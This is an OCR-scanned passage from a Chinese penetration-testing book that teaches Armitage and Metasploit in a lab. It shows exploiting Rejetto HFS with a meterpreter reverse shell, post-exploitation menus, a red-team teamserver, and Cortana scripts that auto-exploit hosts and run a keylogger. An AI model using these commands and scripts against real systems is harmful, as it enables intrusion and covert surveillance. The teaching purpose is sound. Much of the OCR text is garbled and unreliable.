在 目标 主机 上 单 击 鼠标 右键 ， 然 后 在 弹出 的 菜单 中 选择 Services， 这 样 就 可 以 查看 当前 主机 上 正 








* (ij auxiliary 
> (ij exploit 
* (lij payload 
» (lij post 





192.168.10.110 














在 运行 的 服务 。 扫 描 的 结果 与 下 面 的 屏幕 截图 类 似 。 























Console X | Services X 
host | name | port à| proto | info 
192.168.10.109 http 80 tcp Microsoft IIS httpd 7.0 
192.168.10.109 msrpc 135 tcp Microsoft Windows RPC 
192.168.10.109 netbios-ssn 139 tcp Microsoft Windows 98 netbios-ssn 
192.168.10.109 microsoft-ds 445 tcp primary domain: WORKGROUP 
192.168.10.109 ssl/ms-wbt-server — 3389 tcp 
192.168.10.109 http 8081 tcp HttpFileServer httpd 2.3 
192.168.10.109 msrpc 49152 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49153 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49154 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49155 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49156 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49157 tcp Microsoft Windows RPC 








在 192.168.10.109 主机 上 运行 着 很 多 服务 ， 例 如 Microsoft IIS httpd 7.0, Microsoft Windows RPC, 








HttpFileServer httpd 2.3， 等 等 。 通 过 Armitage 找到 与 这 些 服务 相 匹 配 的 渗透 模块 ， 然 后 将 这 些 服务 中 

















的 一 个 作为 目标 。 


11.2.2 ”查找 匹配 模块 


可 以 通过 以 下 方法 找到 对 应 的 渗透 模块 :首先 在 Armitage 导航 栏 上 选择 Attacks 选项 卡 ， 在 弹出 
! 选 择 Find Attack 选项 。Find Attack 选项 将 会 根据 











的 下 拉 列 表 框 
































目标 主机 上 运行 的 服务 与 渗透 模块 数 
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据 库 中 的 内 容 进 行 比 对 。 在 与 数据 库 比 对 的 过 程 结束 以 后 ， 将 会 弹出 一 个 提示 框 ， 提 示 的 内 容 如 下 面 
的 屏幕 截图 所 示 。 








Message 


"w Attack Analysis Complete... 
You will now see an 'Attack' menu attached 
to each host in the Targets window. 


Happy hunting! 


单 击 OK 按钮 以 后 ， 我 们 就 能 看 到 ， 当 在 主机 上 单 击 鼠标 右键 时 ， 弹 出 菜单 中 一 个 名 为 Attack 的 
选项 变 得 可 用 了 。 在 它 的 下 一 级 菜单 中 会 显示 出 可 以 用 来 渗透 目标 主机 的 渗透 攻击 模块 。 





























11.3 ”使 用 Armitage 进行 渗透 


当 一 台 主 机 上 的 Attack 菜单 可 用 时 ， 对 目标 进行 渗透 的 准备 工作 就 完成 了 。 我 们 的 攻击 目标 是 
HttpFileServer 2.3， 采 用 Attack 菜单 上 的 Rejetto HTTPFileServer Remote Command Execution 渗透 模块 


进行 攻击 。 单 击 Exploit 选项 会 弹出 一 个 新 的 窗口 ， 其 中 展示 了 所 有 设置 。 我 们 的 设置 如 下 所 示 。 



















































































192.168.10.110 “192. 168 ) 192.168.10.105 





Attack 192.168.10.109 e o o0 


Rejetto HttpFileServer Remote Command Execution 


Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a |^ 
poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by 
usina '%00' to bvpass the filterina. This module has been tested successfully on HFS — |" | 


av 








| Option 4| Value 
run ru n 
Proxies 
RHOST + 192.168.10.109 
RPORT 8081 
SRVHOST 0.0.0.0 M 





Targets: |0 => Automatic v 


[V] Use a reverse connection 


LJ Show advanced options 








Launch 
在 所 有 选项 都 设置 完毕 之 后 ， 单 击 Launch 来 运行 这 个 针对 目标 的 渗透 模块 。 在 启动 了 渗透 模块 
以 后 ,将 在 界面 的 第 三 个 窗 格 中 看 到 渗透 模块 在 目标 上 的 执行 过 程 ， 如 下 图 所 示 。 
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> (li auxiliary 


68. 10. 110 192. 168. 10. 109 192 
WIN- SWIKKOTKSHX\mm à WIN-SWIKKOTKSHX 








Í Console X | Services X [ exploit x] 


msf » use exploit/windows/http/rejetto hfs exec 
msf exploit(rejetto hfs exec) > set TARGET 0 
TARGET => 0 
msf exploit(rejetto hfs exec) » set PAYLOAD windows/meterpreter/reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 
msf exploit(rejetto hfs exec) » set LHOST 192.168.10.104 
LHOST => 192.168.10.104 
msf exploit(rejetto hfs exec) » set LPORT 21427 
LPORT => 21427 
msf exploit(rejetto hfs exec) » set RPORT 8081 
RPORT => 8081 
msf exploit(rejetto hfs exec) » set RHOST 192.168.10.109 
RHOST => 192.168.10.109 
msf exploit(rejetto hfs exec) » set TARGETURI / 
TARGETURI => / 
msf exploit(rejetto hfs exec) » set SRVPORT 8080 
SRVPORT -» 8080 
msf exploit(rejetto hfs exec) » set SRVHOST 0.0.0.0 
SRVHOST => 0.0.0.0 
msf exploit(rejetto hfs exec) » set HTTPDELAY 10 
HTTPDELAY => 10 
msf exploit(rejetto hfs exec) » exploit -j 
] Exploit running as background job. 
| Started reverse TCP handler on 192.168.10.104:21427 











[^ 
I 

[*] Using URL: http://0.0.0.0:8080/Fegelp 

[*] Local IP: http://192.168. 10. 104:8080/Fegelp 
[*] Server started. 
[* 
[* 
[* 

[* 


Sending a malicious request to / 

192.168.10.109 rejetto hfs exec - 192.168.10.109:8081 - Payload request received: /Fegelp 

Sending stage (957487 bytes) to 192.168.10.109 

Meterpreter session 1 opened (192.168.10.104:21427 -> 192.168.10.109:49281) at 2016-07-12 22:57:07 +0530 
Tried to delete %TEMP%\caiqDMq.vbs, unknown result 

[*] Server stopped. 























我 们 看 到 Meterpreter 窗口 已 经 启动 ， 这 意味 着 已 经 成 功 地 渗透 了 日 标 主 机 。 此 外 ,目标 主机 的 图 
标 会 被 红色 闪电 围绕 ， 这 意味 着 我 们 已 经 拥有 了 该 主机 的 控制 权 。 


11.4 ”使 用 Armitage 进行 后 渗透 攻击 


Armitage 的 使 用 使 得 后 渗透 阶段 变 得 特别 轻松 ,简单 到 只 需 单 击 鼠 标 就 可 以 完成 所 有 的 操作 。 当 
想 执行 后 渗透 模块 的 时 候 ， 只 需 在 成 功 渗透 了 的 主机 上 面 单 击 鼠 标 右键 ， 然 后 选择 下 拉 沫 单 中 的 
Meterpreter 4 选项 。 这 一 切 如 下 图 所 示 。 




































































( YA 
| Attack » 
Login > 
一 


Meterpreter 4 > 


Access 
Interact 
Explore 
Pivoting 
ARP Scan... 


= gi 


Escalate Privileges 
Steal Token 

Dump Hashes 
Persist 

Pass Session 












































选择 Meterpreter 将 会 显示 出 所 有 的 后 渗透 模块 。 假 设 我 们 希望 提高 权限 或 者 获得 系统 级 的 管理 权 
限 ， 那 么 可 以 将 鼠标 移动 到 子 下拉 菜 单 的 Access 处 ， 然 后 单 击 所 需 功 能 的 按钮 即 可 。 
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子 菜单 Interact 提供 了 以 下 功能 : 获得 目标 计算 机 的 cmd 命令 行 、 建 立 另 一 个 Meterpreter， 等 等 。 
子 菜单 Explore 提供 了 Browse Files, Show Processes, Log Keystrokes, Screenshot, Webcam Shot 和 Post 
































Modules 等 选项 ， 用 于 启动 其 他 未 在 当前 菜单 中 出 现 的 后 渗透 模块 ， 如 下 面 的 屏幕 截图 所 示 。 


a 
H Login > 
EA 














Meterpreter 4 Ld 


i Access 
IDEO Services 


Interact 
Explore 
Pivoting 
ARP Scan... 


Kill 


Browse Files 
Show Processes 
Log Keystrokes 
Screenshot 
Webcam Shot 























| Path Post Modules 


可 以 在 Browse Files 选项 上 单 击 以 运行 一 个 简单 的 后 渗透 模块 ， 如 下 图 所 示 。 





























@ | C:\Usersimm\Desktop\abb497bd93aff9fa3379b2aaf73fc9c7-hfs2.3_288 





[D 4|Name | Size | Modified " Mode 

[7] %TEMP9% 2016-06-20 10:32:56 +0530 40777/rwxrwxrwx 

(id ecqxi 2016-06-19 20:34:34 +0530 40777/rwxrwxrwx 
hfs.exe 742kb 2014-02-17 02:28:52 +0530 100777/rwxrwxrwx 








L Upload... | | Make Directory | | List Drives | | Refresh 




















只 需 轻 轻 一 点 鼠标 就 可 以 轻松 地 上 传 、 下 载 或 者 浏览 任何 目标 系统 中 的 文件 。 这 就 是 Armitage 
的 魅力 一 一 一 切 都 以 图 形 化 的 形式 展示 在 你 面前 ， 让 你 的 工作 远离 复杂 的 命令 语法 。 


使 用 Armitage 开展 的 远程 渗透 攻击 到 此 结束 。 


11.5 ”使 用 团队 服务 器 实现 红 队 协同 工作 


大 型 的 渗透 测试 环境 正 是 红 队 大 显 身 手 的 地 方 。 这 里 的 红 队 指 的 就 是 一 组 为 同一 个 任务 协同 工作 
的 渗透 测试 工程 师 ， 他 们 的 合作 往往 会 产生 更 好 的 效果 。Armitage 中 提供 了 一 个 团队 服务 器 ， 这 样 用 
户 就 可 以 和 渗透 测试 团队 的 成 员 实 现 高 效 的 操作 共享 。 我 们 可 以 使 用 teamserver 命令 和 一 个 可 控制 
的 全 地 址 ， 以 及 一 个 自 定义 的 密码 来 快速 地 启动 一 个 团队 服务 器 ， 如 下 图 所 示 。 


rootékali:-£ teamserver 192.168.10.107 Hackers 
[*] Generating X509 certificate and keystore (for SSL) 
[*] Starting RPC daemon 
[*] MSGRPC starting on 127.0.0.1:55554 (NO SSL):Msg... 
[*] MSGRPC backgrounding at 2018-05-14 23:02:33 40530... 
[*] sleeping for 20s (to let msfrpcd initialize) 
[*] Starting Armitage team server 
[*] Use the following connection details to connect your clients: 
Host: 192.168.10.107 
Port: 55553 
User: msf 
Pass: Hackers 


































































































[*] Fingerprint (check for this string when you connect): 
8deala62d14235ced143a9d66dd9b70022e77330 
I'm ready to accept you or other clients for who they are 

















从 上 图 中 可 以 看 到 ， 我 们 已 经 成 功 地 在 IP 地 址 192.168.10.107. 上 启动 了 一 个 团队 服务 器 的 实例 ， 
并 使 用 密码 hackers 进行 了 验证 。 在 服务 器 成 功 初始 化 之 后 ,我 们 需要 将 密码 提供 给 团队 的 其 他 成 员 。 
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然后 ,通过 在 命令 行 中 输入 armitage 和 连接 的 一 些 细节 信息 来 启动 Armitage, 并 连接 到 团队 服务 器 ， 
这 个 过 程 如 下 图 所 示 。 








Connect... oo o0 


Host 192.168.10.107 
Port 55553 

User msf 

Pass —— [ee | 








| Connect Help | 


当成 功 连接 之 后 ， 我 们 就 会 看 到 如 下 所 示 的 界面 。 








Verify Fingerprint o 
p The team server's fingerprint is: 
w- 8deala62d14235ced143a9d66dd9b70022e77330 
Does this match the fingerprint shown 


when the team server started? 














可 以 看 到 ， 这 里 显示 的 指纹 与 团队 服务 器 上 的 指纹 相同 。 我 们 选择 “Yes” 以 继续 。 











Input o 


- What is your nickname? 
Nipun| 


Cancel OK 











我 们 可 以 选择 一 个 昵称 来 加 入 团队 服务 器 。 按 下 OK 键 来 完成 连接 。 








Armitage e o0 


Armitage View Hosts Attacks Workspaces Help 


» (8j auxiliary 

* Ñ exploit 4 
* (Ñ payload d 
* (iij post 





Event Log X 


05/14 23:04:45 *** Nipun joined 
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可 以 看 到 , 我 们 已 经 从 Armitage 的 本 地 化 实例 成 功 地 连接 到 团队 服务 器 。 另 外 , 所 有 连接 的 


都 可 以 通过 事件 日 ; j 户 加 入 了 团队 服务 需 : 








I- 2 


es fe 














HEX. BRAK 











个 J 

















ij 





Armitage View Hosts Attacks Workspaces Help 


» (lj auxiliary 
» (il exploit 
» (lij payload 


» (ill post. 


Event Log X 


Armitage 














05/14 23:04 
05/14 23:0! 
05/14 
05/14 23:06 
05/14 23:0 


Kislay» | 


E 
2 


95:43 <Nipun 


:16 
:34 


*** Nipun joined 
<Nipun > helo 
> Hello, 
*** Kislay joined 
<Kislay >Hi I am Here 


I am Here 








现在 两 个 来 





» @ auxiliary 
» 篇 exploit 





95/14 
05/14 
05/14 
05/14 
05/14 
05/14 





Armitage View Hosts Attacks Workspaces Help 




















自 不 同 实例 的 








Armitage 


192.168.10.1 


192.168.10.102 


263 








» (lj auxiliary 
» @ exploit 4 
”篇 payload P 


» (il post 


Armitage View Hosts Attacks Workspaces Help 


Armitage 








*** Nipun joined 


<Nipun 
<Nipun 
23:06:16 


23:06:34 <Kislay 


Nipun> 


] 户 正在 聊天 。 接 下 来 我 们 开始 一 个 端 


» 入 auxiliary 
» (lj exploit 
» 篇 payload 
» (lij post 


Armitage View Hosts Attacks Workspaces Help 


> helo 


> Hello, I am Here 


*** Kislay joined 


> Hi I am Here 

















了 哪些 变化 。 














192.168.10.1 


192.168.10.102 















45 
:32 
:43 
16 
34 
:27 


192.168.19.9/24 


*** Nipun joined 
<Nipun > helo 
Nipun > Hello, 
*** Kislay joined 
<Kislay >Hi I am Here 
Nipun started a scan: nmap 


I am Here 


--min-hostgroup 96 


T4 


pa 





open 
open 
139/tcp open 
445/tcp open 
1900/tcp open 
MAC Address: 


E8:DE: 
Nmap scan report for 


telnet 

http 

netbi ssn 
microsoft-ds 

upnp 

7:86:BE:0A (Tp 


link Technologies) 
192.168.10.102 


Host is up (-0.044s latency). 


Not shown: 97 
PORT STATE 
135/tcp open 
139/tcp open 
445/tcp open 
MAC Address: 


B0:10:41:C8:46:DF (Hon Hai 


filtered ports 
SERVICE 

msrpc 

netbios-ssn 

microsoft-ds 

Precision Ind 


Nmap scan report for 192.168.10.105 


Host is up (0 


All 100 scanned ports on 192.168.10.105 
00:0! 


MAC Address: 


00028s latency). 
are clo 
9:C0:34:BA (VMware) 


Nmap scan report for 192.168.10.107 


Host is up (0 


9000050s latency) 


All 100 scanned ports on 192.168.10.107 are closed 


Nmap done: 256 IP addresses 





(4 hosts up) scanned in 9.86 seconds 


) 
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可 以 看 到 ， 用户 Nipun 启动 了 端口 扫描 ， 在 其 他 用 户 的 界面 立刻 可 以 看 到 这 个 扫描 的 细节 ， 而 且 
他 用 户 也 可 以 在 界面 中 查看 到 目标 。 接 下 来 假设 Nipun 向 测试 中 添加 一 台 主 机 并 对 其 进行 渗透 。 

















I 





I 









































Armitage oo00 Armitage - windows/http/disk. pulse. enterprise. bof 
Armitage View Hosts Attacks Workspaces Help Armitage View Hosts Attacks Workspaces Help 
| 
» (li auxiliary v (i exploit. 
> @ exploit windows 
» (li payload 1 


> (ll post. isk pulse enterprise bof 
P 


L1 disk pulse enterprise get 
回 diskboss get bof 


Z 回 disksavvy. get. bof 
— [i disksorter bof 


192.168.10:106 192.168.10.1 
NT AUTHORITYASYSTEM @ WIN-6FOSIRT3265 








192.168.10.102 








[Event Log. X [ console. x Meterpreteri x | (EventLog x| nmap x[scan x {Scan x |explot x fexplot x 


05/14 45 *** Nipun joined windows/meterpreter/reverse_tcp 
905/14 23:05:32 <Nipun > helo PAYLOAD windows/meterpreter/reverse tcp 
05/14 23:05:43 «Nipun » Hello, I am Here nsf exploit( ) > set LHOST 192.168.10.107 
95/14 :16 *** Kislay joined LHOST 192.168.10.107 
05/14 34 <Kislay >Hi I am Here msf exploit( ) > set LPORT 29243 
95/14 :07:27 Nipun started a scan: nmap --min-hostgroup 96 -T4 - LPORT => 29243 
192.168.10.0/24 msf exploit( J set RPORT 80 
95/14 23:29:24 Nipun added 1 host RPORT => 80 
05/14 23:29:31 * Nipun launched msf scans at: 192.168.10.106 msf exploit( ) » set SSL false 
05/14 23:30:09 * Nipun launched msf scans at: 192.168.19.166 SSL => false 
05/14 23:31:50 Nipun loit windows/http/disk_pulse_enterprise_bof @ msf exploit( ) > set RHOST 192.168.10.106 
192.168.10.106 RHOST => 192.168.10.106 
05/14 23:32:51 * Nipun exploit windows/http/disk_pulse_enterprise_bof @ msf exploit( ) > exploit -j 
192.168.10.106 Exploit running as background job 5 
05/14 23:32:54 Meterpreter session 1 opened (192.168.10.107:29243 Started reverse TCP handler on 192.168.10.107:29243 
192.168.10.106:56582) at 2018-0. 53 +0530 Generating exploit.. 
05/14 23:33:25 «Kislay > sess Total exploit size: 213 
Triggering the exploit now 
Please be patient, the egghunter may take a while 
Sending stage (179267 bytes) to 192.168.10.106 
Meterpreter session 1 opened (192.168.10.107:29243 -> 192.168.10.106:56582) at 
-14 23:32:55 +0530 
msf exploit( ) > 


我 们 已 经 知道 用 户 Kislay 同样 可 以 查看 扫描 过 程 中 的 全 部 活动 。 但 是 如 果 用 户 Kislay 想 要 获得 这 
个 Meterpreter 的 控制 权限 , 他 就 需要 切换 到 命令 行 中 , 然后 输入 sessions 命令 和 标识 符 , 如 下 图 所 示 。 














































Armit 





Armitage © 


Armitage View Hosts Attacks Workspaces Armitage View Hosts Attacks Workspaces Help 





erprise. bof 























> @ auxiliary 
> (il exploit. 4| 
> (lj payload M 
* i post 
国 disk pulse enterprise get 
国 diskboss get, bof 
1 disksavvy get bof 
一 一 D disksorter bof 
192.168.10:106 192.168.10.1 
NT AUTHORITYASYSTEM @ WIN-6FO9IRT3265 
192.168.10.102 disk 
[Event Log XT Console x [Meterpreteri. x] [EventLog x| nmap x[scan x[scan x {exploit x [explo X] 











meterpreter > sysinfo ^ windows/meterpreter/reverse_tcp 
Computer WIN-6F09IRT3265 PAYLOAD windows/meterpreter/reverse_tcp 
0 Windows 7 (Build 7600). msf exploit( ) > set LHOST 192.168.10.107 
Architecture x86 LHOST 192.168.10.107 
System Language en_US msf exploit( ) LPORT 29243 
Domain WORKGROUP LPORT => 29243 
Logged On Users : 4 msf RPORT 80 
Meterpreter x86/windows RPORT 
SSL false 
SSL 
msf exploit( set RHOST 192.168.10.106 
RHOST => 192.168.10.106 
msf exploit( exploit -j 
Exploit running as background job 5. 
Started reverse TCP handler on 192.168. 10.107 :29243 
Generating exploit 
Total exploit size: 21383 
Triggering the exploit now 
Please be patient, the egghunter may take a while. 
] Sending stage (179267 bytes) to 192.168.10.106 
] Meterpreter session 1 opened (192.168.10.107:29243 -> 192.168.10 
加 2018-05-14 23:32:55 +0530 
meterpreter > | msf exploit( ) 
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可 以 看 到 ， 在 团队 环境 中 工作 远 比 单打 独 斗 更 高 效 。 在 下 一 节 中 我 们 将 学 习 如 何在 Armitage 中 
编程 。 














11.6 Armitage 脚本 编写 


Cortana 是 一 种 脚本 型 语言 ， 在 Armitage 中 用 来 创建 攻击 向 量 。 渗 透 测 试 工程 师 们 使 用 Cortana 
来 进行 红 队 测试 ， 对 攻击 向 量 进行 克隆 ,使 其 像 机 器 人 一 样 工作 。 男 外 ， 红 队 通 常 是 指 一 个 独立 的 
队 ， 这 个 团队 会 对 目标 组 织 发 起 挑战 ， 以 此 提高 它 的 安全 措施 和 工作 效率 。 
Cortana 利用 脚本 语言 来 使 用 Metasploit 的 远程 过 程 客户 端 ， 这 为 自动 化 地 控制 Metasploit 操作 与 
图 数据 库 提 供 了 便利 条 件 。 
此 外 ，Cortana 语言 可 以 按照 渗透 测试 工程 师 的 思路 自动 化 响应 系统 的 特定 事件 。 假 设 我 们 正在 
对 一 个 包含 了 100 台 主 机 的 网 络 进行 渗透 测试 ， 其 中 29 台 主 机 上 运行 着 Windows Server 2012 系统 ， 
其 他 主机 上 运行 着 Linux 操 作 系统 。 我 们 需要 一 种 方法 , 它 可 以 自动 使 用 Rejetto HTTPFileServer Remote 
Command Execution 渗透 模块 对 这 些 在 8081 端口 上 运行 着 HttpFileServer httpd 2.3 软件 的 Windows 
Server 2012 系统 进行 渗透 。 
我 们 可 以 轻松 地 完成 这 样 一 段 脚 本 来 实现 这 个 任务 的 自动 化 ,与 此 同时 还 能 节省 大 量 时 间 。 一 且 
有 符合 条 件 的 主机 上 线 ， 立 刻 使 用 rejetto_hfs_exee 进行 渗透 工作 ， 成 功 后 还 会 在 其 上 执行 预定 
的 后 渗透 测试 。 
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11.6.1 Cortana 基础 知识 


使 用 Cortana 编写 一 个 简单 的 攻击 模块 脚本 将 有 助 于 我 们 直观 地 理解 这 种 语言 。 因 此 ， 来 看 一 个 
关于 自动 攻击 Windows 操作 系统 上 8081 端口 的 示例 脚本 : 
on service add 8081 ( 
println("Hacking a Host running $1 (" . host os($1) . ")"); 


if (host os($1) eq "Windows 7") ( 
exploit("windows/http/rejetto hfs exec", $1, $(RPORT -» 

















"8081")); 
j 
} 


当 使 用 Nmap 或 者 MSF 扫描 发 现 目 标的 8081 端口 处 于 开放 状态 时 ， 前 述 脚本 便 会 执行 。 这 段 脚 
本 会 检查 目标 系统 是 否 为 Windows 7; 如 果 结 果 为 真 ，Cortana 就 会 自动 利用 rejetto_hfs_exec 12 
透 模块 攻击 目标 的 8081 端口 。 


在 这 段 脚 本 中 ，s1 指明 主机 的 卫 地 址 ;Print_ln 函数 输出 打印 字符 和 变量 ; host_os 作为 一 
个 Cortana 中 编写 的 函数 可 以 返回 主机 的 操作 系统 类 型 ， 函 数 exploit 在 参数 $1 指定 的 TP 地 址 启动 
一 个 渗透 模块 ;，% 表 示 为 渗透 模块 设置 的 选项 ， 如 果 服 务 运行 在 不 同 的 端口 或 者 需要 其 他 细节 ， 可 以 
通过 8 设置 这 些 渗 透 模块 的 选项 ，service_ad9_8081 指定 了 当 在 特定 客户 端 发 现 开放 的 8081 端口 
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时 触发 的 事件 。 
保存 这 个 脚本 。 然 后 在 Armitage 中 载 和 这 个 脚本 。 首 先 在 导航 栏 上 选择 Armitage 选项 卡 ， 然 后 
单 击 Scripts。 














Console X | Workspaces X | Scripts X 





name 


| flags 

















Load Unload Console Scripts 


为 了 在 系统 上 运行 这 个 脚本 ， 需 要 执行 以 下 步骤 。 





(1) fl 


(2) 选择 需要 的 脚本 ， 然 后 单 击 Open. "Hd 


(3) 进入 Cortana 控制 台 ， 然后 输入 命令 help， 这 样 可 以 列 出 在 处 至 
(4) 如 果 你 想 查 看 当 Cortana 脚本 运 





E Load 按钮 ， 然 后 在 Armitage 中 载 人 一 个 Cortana 脚本 ， 过 程 如 下 。 





Open 





Lookin: |@ cortana jv (a) (ej (Gi | ED) 

















File Name: 8081.cna 





Files of Type: |All Files 


Iv 


Cancel 








HIR FEE Armitage 中 载 入 这 个 脚本 ， 如 下 图 所 示 。 

















Console X | Workspaces X [Scripts Xx 





name 


| flags 





Iroot/Desktop/cortana/8081.cna 











Unload Console Scripts 























脚本 时 可 以 使 用 的 各 种 选项 。 
行 时 都 执行 了 哪些 操作 ， 可 以 输入 命令 logon, 在 其 后 面 输入 C 








脚本 的 名 称 。1logon 命令 将 为 脚本 提供 日 志 记 录 功 能 ， 并 会 记录 由 脚本 执行 的 每 一 个 操作 ,整个 过 程 
如 下 图 所 示 。 
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Scripts X | Cortana X 


cortana> help 





Commands 


proff 
profile 
pron 
reload 
troff 
tron 
unload 


cortana> logon 8081.cna 
Logging '8081.cna' 





cortana> | 























(5) 现在 对 目标 执行 一 次 深度 扫描 。 首 先 选中 Hosts 选项 卡 ， 然 后 在 弹出 的 Nmap 子 菜单 中 选中 
Intense Scan, 

(6) 正如 我 们 清楚 看 到 的 那样 ， 一 台 开 放 着 8081 端口 的 主机 被 发 现 了 。 让 我 们 回 到 Cortana f: 
台 来 查看 是 否 发 生 了 什么 。 








c 














Armitage View Hosts Attacks Workspaces Help 


|> @ auxiliary 
> (8j exploit 
|> (lij payload 
» (lili post 


192.168. 10.109 
KSHX\mm @ WIN-SWIKKOTKSHX 





2v 


Console X | Scripts X | Cortana X | nmap X | nmap X | nmap X|nmap X 


cortana» logon 8081.cna A 
Logging '8081.cna' 

Hacking a Host running 192.168.10.109 (Windows 7) 

[22:29:42] metasploit module.compatible payloads('windows/http/rejetto hfs exec') at 

internal.sl:505 

[22:29:42] metasploit module.execute('exploit', 'windows/http/rejetto hfs exec', %(LHOST => 

'192.168.10.104', RPORT => '8081', LPORT => 30764, RHOST => '192.168.10.109', PAYLOAD => 

'windows/meterpreter/bind tcp', TARGET => '0')) at internal.sl:499 

cortana» 


(7) Cortana 已 经 通过 自动 运行 的 渗透 模块 搞定 了 目标 主机 。 


正如 我 们 现在 看 到 的 那样 ，Cortana 可 以 帮助 我 们 轻松 地 实现 渗透 攻击 的 自动 化 运行 。 在 接 下 来 的 
几 节 中 ， 我 们 将 会 看 到 如 何 实现 后 渗透 攻击 的 自动 化 ， 以 及 如 何 使 用 Cortana 控制 Metasploit 中 的 功能 。 
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11.6.2 ”控制 Metasploit 


Cortana 能 很 好 地 控制 Metasploit 的 功能 。 可 以 使 用 Cortana 对 Metasploit 发 出 各 种 命令 。 让 我 们 
通过 一 个 示例 来 更 好 地 理解 Cortana 对 Metasploit Bd: 


cmd_async ("hosts"); 

cmd_async ("services"); 

on console_hosts { 

println("Hosts in the Database"); 
printlint" $3 *); 

} 

on console_services { 
println("Services in the Database"); 
printin(" $3 "); 

} 











c 


o 








T 

















在 这 段 脚本 中 ， 命 令 cmd_async 发 送 hosts 命令 和 services 命令 到 Metasploit 并 确保 它们 被 
执行 。 此 外 ， 这 些 console_* 函 数 被 用 来 打印 这 条 命令 的 输出 。Metasploit 将 执行 这 些 命令 。 然 而 ， 
为 了 打印 这 个 输出 内 容 ， 需 要 定义 函数 console_*。 另 外 ，$3 是 一 个 变量 ， 其 中 保存 了 命令 的 输出 
内 容 。 在 ready.cna 脚本 加 载 完 毕 之 后 ， 打 开 Cortana 控制 台 查 看 输出 的 内 容 。 





























Hosts in the Database 

Hosts 

address mac name os name os flavor os sp purpose info comments 
192.168.10.109 08:00:27:84:55:8c  WIN-SWIKKOTKSHX Windows 7 client 
Services in the Database 

Services 

host port proto name state info 

192.168.10.109 80 tcp http open Microsoft IIS httpd 7.0 
192.168.10.109 135 tcp msrpc open Microsoft Windows RPC 
192.168.10.109 139 tcp netbios-ssn open Microsoft Windows 98 netbios-ssn 
192.168.10.109 445 tcp microsoft-ds open primary domain: WORKGROUP 
192.168.10.109 3389 tcp ssl/ms-wbt-server open 

192.168.10.109 $8081 tcp http open  HttpFileServer httpd 2.3 
192.168.10.109 49152 tcp unknown open 

192.168.10.109 49153 tcp unknown open 

192.168.10.109 49154 tcp unknown open 

192.168.10.109 49155 tcp unknown open 

192.168.10.109 49156 tcp unknown open 

192.168.10.109 49157 tcp unknown open 

cortana» 











很 明显 ， 命 令 的 输出 内 容 显示 在 屏幕 上 。 到 这 里 可 以 结束 这 个 阶段 的 学 习 了 。 不 过 ， 要 想得到 更 no 
多 有 关 使 用 Cortana 脚本 通过 Armitage 来 控制 Metasploit 的 信息 ,请 访问 http://www.Fastandeasyhacking. 
com/download/cortana/cortana_tutorial.pdf。 


























286 第 11 章 利用 Armitage 实现 Metasploit 的 可 视 化 管理 





11.6.3 ”使 用 Cortana 实现 后 渗透 攻击 


使 用 Cortana 实 现 后 渗透 攻击 也 是 十 分 简单 的 。 使 用 Cortana 内 置 的 功能 可 以 轻松 控制 后 渗透 攻击 。 
让 我 们 通过 下 面 的 示例 脚本 理解 这 一 点 。 


on heartbeat 15s { 
local('$sid'); 

foreach $sid (session ids()) { 
if (-iswinmeterpreter $sid && -isready $sid) ( 
m cmd($sid, "getuid"); 

m cmd($sid, "getpid"); 

on meterpreter getuid ( 
prantglni(t* SIA); 

} 

on meterpreter getpid ( 
println(" $3 "); 

j 

















} 
} 


在 这 个 脚本 中 ， 我 们 使 用 了 一 个 名 为 heartbeat 15s 的 函数 。 这 个 函数 每 15 秒 会 重复 执行 一 
次 。 因 此 ， 它 被 称 为 心跳 函数 (heart beat function )。 

函数 local 表示 ssid 是 当前 函数 中 的 一 个 局 部 变量 。 下 一 条 foreach 语句 是 一 个 对 所 有 开放 
会 话 的 循环 遍历 。 以 if 开始 的 语句 将 会 对 每 一 个 会 话 进行 检查 ， 检 查 内 容 为 该 会 话 类 型 是 否 为 
Windows Meterpreter 控制 ， 以 及 该 会 话 是 否 可 以 进行 交互 并 接受 命令 。 

m cmd 函数 使 用 诸如 ssidq ( 即 会 话 ID ) 等 参数 和 命令 将 命令 发 送 给 Meterpreter Zio E, R 
们 定义 了 一 个 meterpreter_* 形 式 的 函数 ， 其 中 * 意 味 着 即将 发 送 到 Meterpreter 会 话 的 命令 。 这 个 
函数 将 会 打印 sent 命令 的 输出 ， 正 如 在 之 前 的 练习 中 console hosts 和 console_serlices 所 做 
的 那样 。 

执行 这 个 脚本 ， 并 对 结果 进行 分 析 ， 如 下 图 所 示 。 


Server username: WIN-SWIKKOTKSHXNmm 













































































Current pid: 740 
Server username: WIN-SWIKKOTKSHX'mm 
Server username: WIN-SWIKKOTKSHX'mm 
Current pid: 740 
Current pid: 740 
Server username: WIN-SWIKKOTKSHX' mm 
Server username: WIN-SWIKKOTKSHX' mm 
Server username: WIN-SWIKKOTKSHX' mm 
Current pid: 740 


Current pid: 740 








Current pid: 740 
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成 功 载 人 并 执行 了 这 段 脚 本 之 后 ， 每 15 秒 就 会 显示 目标 系统 的 用 户 ID 和 当前 使 用 进程 的 ID。 





有 关 Cortana 的 后 渗透 功能 .脚本 以 及 函数 的 更 多 信息 ,请 访问 http:Wwww.fastandeasy- 
hacking.com/download/cortana/cortana_tutorial.pdf。 


11.6.4 ”使 用 Cortana 创建 自 定义 菜单 


通过 Meterpreter 会 话 成 功 连接 到 目标 计算 机 之 后 ，Cortana 还 可 以 为 我 们 提供 构建 自 定义 菜单 的 
功能 。 让 我 们 使 用 Cortana 来 创建 一 个 自 定义 键盘 记录 器 , 并 通过 分 析 以 下 脚本 来 了 解 Cortana 脚本 的 
工作 机 制 。 


popup meterpreter bottom { 
menu "&My Key Logger" ( 
item "&Start Key Logger" ( 
m cmd($1, "keyscan start"); 
} 
item "&Stop Key Logger" { 
m cmd($1, "keyscan stop"); 
) 
item "&Show Keylogs" ( 

m cmd($1, "keyscan dump"); 
} 
on meterpreter keyscan start { 
printinge $3 "js 

} 
on meterpreter keyscan, stop { 
printlnit" $3 "Jz 

} 
on meterpreter keyscan, dump { 
printinit" $3 "rj: 

} 

} 

} 


这 上段 代码 实现 了 在 Meterpreter 子 菜单 中 创建 一 个 新 的 弹出 菜单 选项 。 不 过 , 只 有 成 功 渗透 了 目标 
